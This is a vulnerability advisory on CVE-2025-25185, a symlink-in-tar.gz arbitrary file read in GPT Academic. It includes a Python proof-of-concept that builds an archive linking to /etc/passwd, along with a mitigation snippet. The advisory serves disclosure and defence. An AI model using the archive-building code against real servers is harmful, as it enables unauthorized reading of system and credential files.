CVE-2025-25185
Published: 03 March 2025
Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to gain initial access to a network.
Security Summary
CVE-2025-25185 is an arbitrary file read vulnerability affecting GPT Academic, an open-source tool that provides interactive interfaces for large language models, in versions 3.91 and earlier. The issue arises because the application fails to account for soft links (symlinks) when handling uploaded tar.gz archives. Classified under CWE-59 (Improper Link Resolution Before File Access), it carries a CVSS v3.1 base score of 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N), indicating high confidentiality impact from network-accessible exploitation with low complexity and no privileges required.
An unauthenticated attacker can exploit this vulnerability remotely by crafting a tar.gz file containing a malicious soft link that points to a target file on the victim server. After uploading the archive, the server decompresses it, and subsequent access to the symlink resolves to the targeted server file, enabling arbitrary file reads across the entire filesystem.
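The attack described above can be sketched in a few lines of Python. This is an illustrative proof-of-concept of the archive construction only, not the actual exploit; the link target `/etc/passwd` and the entry name `leak.txt` are hypothetical examples.

```python
import io
import tarfile

def build_malicious_archive(link_target: str = "/etc/passwd") -> bytes:
    """Build a tar.gz whose single entry is a symlink to link_target.

    A tar entry of type SYMTYPE carries no file data, only the link
    target string. If a server extracts this archive and later reads
    "leak.txt", the read resolves through the symlink to link_target.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name="leak.txt")
        info.type = tarfile.SYMTYPE
        info.linkname = link_target
        tar.addfile(info)  # no file payload needed for a symlink entry
    return buf.getvalue()
```

Uploading such an archive costs the attacker nothing but a few hundred bytes; the damage is done entirely by the server's own extraction and subsequent file access.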
The GitHub security advisory (GHSA-gqp5-wm97-qxcv) and a related commit (5dffe8627f681d7006cebcba27def038bb691949) in the binary-husky/gpt_academic repository address the issue, with the commit likely implementing the fix for symlink handling during archive processing.
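The exact patched code is not reproduced here, but the general mitigation pattern is straightforward: reject link-type members before extracting an untrusted archive. A minimal sketch, assuming a server-side helper (the function name and error handling are illustrative, not GPT Academic's actual API):

```python
import tarfile

def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract an uploaded tar.gz, refusing symlink and hardlink members.

    Checking every member before calling extractall() prevents a
    malicious archive from planting a link that later resolves to an
    arbitrary file on the server.
    """
    with tarfile.open(archive_path, mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.issym() or member.islnk():
                raise ValueError(f"refusing link member: {member.name}")
        tar.extractall(path=dest_dir)
```

On Python 3.12+, `tar.extractall(path=dest_dir, filter="data")` achieves a similar effect by rejecting link members and other unsafe features during extraction.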
As GPT Academic supports interactive access to large language models, this vulnerability is relevant to AI/ML environments where such interfaces are deployed, potentially exposing sensitive model data or configurations. No public evidence of real-world exploitation has been reported.
Details
- CWE(s)
  - CWE-59: Improper Link Resolution Before File Access ('Link Following')
Affected Products
- GPT Academic (binary-husky/gpt_academic), versions 3.91 and earlier
AI Security Analysis
- AI Category
- Enterprise AI Assistants
- Risk Domain
- Privacy and Disclosure
- OWASP Top 10 for LLMs 2025
- None mapped
- MITRE ATLAS Techniques
- None mapped
- Classification Reason
- GPT Academic is a platform providing interactive interfaces for large language models (LLMs), fitting the Enterprise AI Assistants category as it enables user interaction with AI models in a deployed environment.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Exploitation of the symlink-handling flaw through a tar.gz upload to a public-facing web application (T1190) enables arbitrary reads of data from the local system (T1005).